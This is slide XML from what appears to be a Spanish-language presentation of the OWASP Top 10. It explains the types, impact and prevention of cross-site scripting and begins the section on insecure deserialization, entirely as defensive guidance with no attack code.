              <a:rPr lang="es-AR" sz="820" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS Reflejado: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>la aplicación o API utiliza datos sin validar, suministrados por un usuario y codificados como parte del HTML o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de salida. No existe una cabecera que establezca la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Política de Seguridad de Contenido (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Un ataque exitoso permite al atacante ejecutar comandos arbitrarios (HTML y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) en el navegador de la víctima. Típicamente el usuario deberá interactuar con un enlace, o alguna otra página controlada por el atacante, como un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>ataque del tipo pozo de agua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, publicidad maliciosa, o similar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="820" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS Almacenado: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>la aplicación o API almacena datos proporcionados por el usuario sin validar ni sanear, los que posteriormente son visualizados o utilizados por otro usuario o un administrador. Usualmente es considerado como de riesgo de nivel alto o crítico.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="820" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS Basados en DOM: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, aplicaciones de página única o APIs incluyen datos dinámicamente, controlables por un atacante. Idealmente, se debe evitar procesar datos controlables por el atacante en APIs no seguras.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Los ataques XSS incluyen el robo de la sesión, apropiación de la cuenta, evasión de autentificación de múltiples pasos, reemplazo de nodos DOM, inclusión de troyanos de autentificación, ataques contra el navegador, descarga de software malicioso, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, y otros tipos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>ataques al lado cliente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId17"/>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PortSwigger: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300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prevenir XSS requiere mantener los datos no confiables separados del contenido activo del navegador.</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Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> seguros que, por diseño, automáticamente codifican el contenido para prevenir XSS, como en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ruby 3.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>React JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Codificar los datos de requerimientos HTTP no confiables en los campos de salida HTML (cuerpo, atributos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, CSS, o URL) resuelve los XSS Reflejado y XSS Almacenado. La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>hoja de trucos OWASP para evitar XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tiene detalles de las técnicas de codificación de datos requeridas.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Aplicar codificación sensitiva al contexto, cuando se modifica el documento en el navegador del cliente, ayuda a prevenir DOM XSS. Cuando esta técnica no se puede aplicar, se pueden usar técnicas similares de codificación, como se explica en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>hoja de trucos OWASP para evitar XSS DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Habilitar una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Política de Seguridad de Contenido (CSP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>es una defensa profunda para la mitigación de vulnerabilidades XSS, asumiendo que no hay otras vulnerabilidades que permitan colocar código malicioso vía inclusión de archivos locales, bibliotecas vulnerables en fuentes conocidas almacenadas en Redes de Distribución de Contenidos (CDN) o localmente.</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A7</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419348283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Explotabilidad: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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia: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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad: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Técnico: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Existen herramientas automatizadas que permiten detectar y explotar las tres formas de XSS, y también se encuentran disponibles </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>kits</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> de explotación gratuitos.</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es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS es la segunda vulnerabilidad más frecuente en OWASP Top 10, y se encuentra en alrededor de dos tercios de todas las aplicaciones.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Las herramientas automatizadas pueden detectar algunos problemas XSS en forma automática, particularmente en tecnologías maduras como PHP, J2EE / JSP, y ASP.NET</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a: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es-AR" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El impacto de XSS es moderado para el caso de XSS Reflejado y XSS en DOM, y severa para XSS Almacenado, que permite ejecutar secuencias de comandos en el navegador de la víctima, para robar credenciales, secuestrar sesiones, o la instalación de software malicioso en el equipo de la víctima.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900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aplicaciones y APIs serán vulnerables si deserializan objetos hostiles o manipulados por un atacante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Esto da como resultado dos tipos primarios de ataques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ataques relacionados con la estructura de datos y objetos; donde el atacante modifica la lógica de la aplicación o logra una ejecución remota de código que puede cambiar el comportamiento de la aplicación durante o después de la deserialización.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ataques típicos de manipulación de datos; como ataques relacionados con el control de acceso, en los que se utilizan estructuras de datos existentes pero se modifica su contenido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La serialización puede ser utilizada en aplicaciones para:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Comunicación remota e Inter-Procesos (RPC/IPC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protocolo de comunicaciones, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Brokers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de mensajes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Caching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y Persistencia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bases de datos, servidores de caché y sistemas de archivos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
